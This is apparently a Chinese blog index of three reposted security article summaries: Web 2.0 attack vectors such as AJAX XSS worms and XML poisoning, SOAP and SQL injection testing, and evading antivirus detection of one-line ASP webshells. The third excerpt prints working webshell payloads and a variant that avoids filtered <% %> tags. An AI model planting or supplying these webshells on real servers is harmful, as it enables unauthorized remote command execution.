十大web2.0攻击向量(转)
摘要:. AJAX中之跨站脚本攻击 例子, Yamanner蠕虫利用了Yahoo Mail的AJAX的跨站脚本漏洞,Samy蠕虫利用了MySpace.com的跨站脚本漏洞。2. XML 中毒(poisoning) 攻击者可以通过复制节点进行DOS攻击,或者生成不合法的XML导致服务器端逻辑的中断。攻击者也可以操纵外部实体,导致打开任何文件或TCP连接端口。XML数据定义的中毒也可以导致运行流程的改变,助攻击者获取机密信息。3. 运行恶意的AJAX编码 AJAX编码可以在不为用户所知的情形下运行,假如用户先登录一个机密网站,机密网站返回一个会话cookie,然后用户在没有退出机密网站的情形下,访问攻击
阅读全文
SOAP注入攻击详解(转)
摘要:在本文中,我们将要对SOAP服务中的一系列安全漏洞进行测试及利用。并不是所有的攻击行为都针对SOAP,我们必须对这一情况具备清醒的认识。这一行的新手往往有种先入为主的观念,认为威胁网页服务安全的各类攻击总带有一些神秘色彩并且超难阻止。但实际情况是,网页服务遭受的许多侵袭都源自与浏览器应用程序安全缺陷相类似的同一种漏洞。我们在本文中打算讲解并利用的漏洞类型分别为:1. SOAP 注入2. SQL 注入3. 默认内容4. 破损的认证及会话管理SOAP 注入虽然网页服务方面的许多安全缺陷都有相似之处或者几乎同样为大众所熟知,而且这些漏洞不仅被编纂成文供人们参考,甚至要将其真正利用起来也不需要什么高超
阅读全文
一句话木马的免杀(转)
摘要:在入侵过程中,我们常常会遇到这样的问题,因为大马太大,而不能上传,怎么办,这个时候就只能用小马来辅助,但是,小马的语句又被杀,今天我们来说说一句话小马的免杀方法。 众所周之,一句话的语句是<%execute request("密码")%> 1.入侵过程中<%,%>符号被过滤怎么办?我们可以想办法避开<%,%> <scriptlanguage=VBScript runat=server>execute request("cmd")</Script> 2.网络中流传的最小的木马代码是<%eva
阅读全文